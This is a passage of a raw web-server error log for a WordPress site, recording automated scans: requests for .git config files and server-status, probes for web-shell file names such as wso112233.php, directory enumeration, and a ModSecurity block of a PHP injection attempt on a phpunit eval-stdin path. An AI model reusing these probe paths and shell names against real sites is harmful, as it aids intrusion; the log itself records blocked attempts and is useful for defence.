13:12:13.619355 2024] [autoindex:error] [pid 29080:tid 140353986340608] [client 178.128.208.198:51348] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/01/05 15:10:18 [error] 29043#29043: *119492 access forbidden by rule, client: 110.138.94.27, server: mail.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/05 15:10:19 [error] 29042#29042: *119493 access forbidden by rule, client: 110.138.94.27, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/05 15:36:01 [error] 29043#29043: *119836 access forbidden by rule, client: 3.239.127.242, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Fri Jan 05 16:11:49.240204 2024] [:error] [pid 29081:tid 140353927591680] [client 139.59.236.203:54822] [client 139.59.236.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZZhwlcpGDUEedO1--7lN0AAAAFI"] 2024/01/05 16:12:23 [error] 29042#29042: *120454 access forbidden by rule, client: 139.59.236.203, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 05 17:27:38.083593 2024] [authz_core:error] [pid 29082:tid 140353994733312] [client 165.22.74.203:56542] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/01/05 17:27:41 [error] 29043#29043: *121356 access forbidden by rule, client: 165.22.74.203, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jan 05 17:48:35.208968 2024] [authz_core:error] [pid 29695:tid 140354019911424] [client 198.199.121.22:57084] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/01/05 17:48:37 [error] 29042#29042: *121757 access forbidden by rule, client: 198.199.121.22, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jan 05 17:48:40.011302 2024] [authz_core:error] [pid 29082:tid 140354019911424] [client 167.71.185.75:57114] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/01/05 17:48:42 [error] 29043#29043: *121784 access forbidden by rule, client: 167.71.185.75, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 05 20:27:42.944080 2024] [:error] [pid 29695:tid 140353910806272] [client 167.71.243.176:60684] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Fri Jan 05 20:27:47.413906 2024] [:error] [pid 29695:tid 140353877235456] [client 167.71.243.176:60706] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Jan 05 20:27:52.007850 2024] [:error] [pid 29082:tid 140354110650112] [client 167.71.243.176:60730] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Jan 05 20:29:33.028615 2024] [:error] [pid 29695:tid 140353961162496] [client 167.71.243.176:32942] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Fri Jan 05 20:29:43.804743 2024] [:error] [pid 29082:tid 140354135828224] [client 167.71.243.176:32976] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/x.php [Fri Jan 05 20:30:34.987295 2024] [:error] [pid 29695:tid 140354152613632] [client 167.71.243.176:33204] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ssl.php [Fri Jan 05 20:31:00.514092 2024] [:error] [pid 29081:tid 140353952769792] [client 167.71.243.176:33306] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Jan 05 20:31:01.091666 2024] [:error] [pid 29695:tid 140353927591680] [client 167.71.243.176:33310] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Jan 05 20:31:14.974133 2024] [:error] [pid 29080:tid 140354011518720] [client 167.71.243.176:33370] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Fri Jan 05 20:31:20.307297 2024] [:error] [pid 29695:tid 140354152613632] [client 167.71.243.176:33400] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Fri Jan 05 20:31:25.918979 2024] [:error] [pid 29081:tid 140353919198976] [client 167.71.243.176:33426] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Fri Jan 05 20:31:44.572292 2024] [:error] [pid 29695:tid 140353902413568] [client 167.71.243.176:33526] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Jan 05 20:31:44.575224 2024] [:error] [pid 29695:tid 140353894020864] [client 167.71.243.176:33528] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Jan 05 20:32:00.264056 2024] [:error] [pid 29080:tid 140354110650112] [client 167.71.243.176:33602] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/404.php [Fri Jan 05 20:32:12.644594 2024] [autoindex:error] [pid 29695:tid 140353969555200] [client 167.71.243.176:33654] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/01/05 20:32:12 [error] 29042#29042: *124073 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 167.71.243.176, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/01/05 20:32:12 [error] 29042#29042: *124073 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 167.71.243.176, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Fri Jan 05 20:32:13.309146 2024] [autoindex:error] [pid 29695:tid 140353885628160] [client 167.71.243.176:33658] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.162850 2024] [autoindex:error] [pid 29695:tid 140354135828224] [client 167.71.243.176:33670] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.789780 2024] [autoindex:error] [pid 29082:tid 140354019911424] [client 167.71.243.176:33676] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.793203 2024] [autoindex:error] [pid 29080:tid 140353902413568] [client 167.71.243.176:33678] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.800046 2024] [autoindex:error] [pid 29695:tid 140353977947904] [client 167.71.243.176:33680] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.803459 2024] [autoindex:error] [pid 29081:tid 140354011518720] [client 167.71.243.176:33682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.809804 2024] [autoindex:error] [pid 29080:tid 140353952769792] [client 167.71.243.176:33686] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.814927 2024] [autoindex:error] [pid 29081:tid 140353935984384] [client 167.71.243.176:33688] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.818218 2024] [autoindex:error] [pid 29080:tid 140353977947904] [client 167.71.243.176:33690] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.821235 2024] [autoindex:error] [pid 29695:tid 140353952769792] [client 167.71.243.176:33692] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.824793 2024] [autoindex:error] [pid 29082:tid 140353902413568] [client 167.71.243.176:33694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.886474 2024] [:error] [pid 29081:tid 140353902413568] [client 167.71.243.176:33696] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 20:32:15.886714 2024] [:error] [pid 29081:tid 140353902413568] [client 167.71.243.176:33696] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 20:32:15.886865 2024] [:error] [pid 29081:tid 140353902413568] [client 167.71.243.176:33696] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 20:32:15.887019 2024] [:error] [pid 29081:tid 140353902413568] [client 167.71.243.176:33696] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Jan 05 20:32:15.890940 2024] [autoindex:error] [pid 29695:tid 140353986340608] [client 167.71.243.176:33698] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.895265 2024] [autoindex:error] [pid 29080:tid 140354011518720] [client 167.71.243.176:33700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.900711 2024] [autoindex:error] [pid 29082:tid 140354011518720] [client 167.71.243.176:33702] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.907763 2024] [autoindex:error] [pid 29081:tid 140354110650112] [client 167.71.243.176:33704] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.911089 2024] [autoindex:error] [pid 29080:tid 140353935984384] [client 167.71.243.176:33706] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.914264 2024] [autoindex:error] [pid 29695:tid 140353877235456] [client 167.71.243.176:33708] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.924058 2024] [autoindex:error] [pid 29082:tid 140354028304128] [client 167.71.243.176:33710] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.927326 2024] [autoindex:error] [pid 29081:tid 140353944377088] [client 167.71.243.176:33712] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.931185 2024] [autoindex:error] [pid 29080:tid 140353919198976] [client 167.71.243.176:33714] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:15.938300 2024] [autoindex:error] [pid 29695:tid 140353927591680] [client 167.71.243.176:33716] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:18.500008 2024] [autoindex:error] [pid 29081:tid 140354135828224] [client 167.71.243.176:33730] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:30.669465 2024] [autoindex:error] [pid 29082:tid 140354110650112] [client 167.71.243.176:33786] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:31.854876 2024] [autoindex:error] [pid 29081:tid 140353919198976] [client 167.71.243.176:33792] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.761545 2024] [autoindex:error] [pid 29082:tid 140353877235456] [client 167.71.243.176:33824] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.765139 2024] [autoindex:error] [pid 29080:tid 140354019911424] [client 167.71.243.176:33826] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.768747 2024] [autoindex:error] [pid 29695:tid 140353935984384] [client 167.71.243.176:33828] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.777304 2024] [autoindex:error] [pid 29081:tid 140353952769792] [client 167.71.243.176:33830] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.781603 2024] [autoindex:error] [pid 29695:tid 140353902413568] [client 167.71.243.176:33832] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.785703 2024] [autoindex:error] [pid 29080:tid 140354119042816] [client 167.71.243.176:33834] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.791629 2024] [autoindex:error] [pid 29082:tid 140354003126016] [client 167.71.243.176:33836] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.795068 2024] [autoindex:error] [pid 29081:tid 140353927591680] [client 167.71.243.176:33838] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.798413 2024] [autoindex:error] [pid 29695:tid 140354011518720] [client 167.71.243.176:33840] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.806175 2024] [autoindex:error] [pid 29080:tid 140353927591680] [client 167.71.243.176:33842] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:37.810160 2024] [autoindex:error] [pid 29695:tid 140354019911424] [client 167.71.243.176:33844] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:38.408881 2024] [autoindex:error] [pid 29080:tid 140353986340608] [client 167.71.243.176:33848] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:38.412479 2024] [autoindex:error] [pid 29081:tid 140354144220928] [client 167.71.243.176:33850] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.040190 2024] [autoindex:error] [pid 29081:tid 140353910806272] [client 167.71.243.176:33856] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.044730 2024] [autoindex:error] [pid 29082:tid 140353894020864] [client 167.71.243.176:33858] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.048116 2024] [autoindex:error] [pid 29080:tid 140353969555200] [client 167.71.243.176:33860] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.055543 2024] [autoindex:error] [pid 29695:tid 140354152613632] [client 167.71.243.176:33862] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.059913 2024] [autoindex:error] [pid 29080:tid 140353910806272] [client 167.71.243.176:33864] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.070711 2024] [autoindex:error] [pid 29695:tid 140354110650112] [client 167.71.243.176:33866] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex 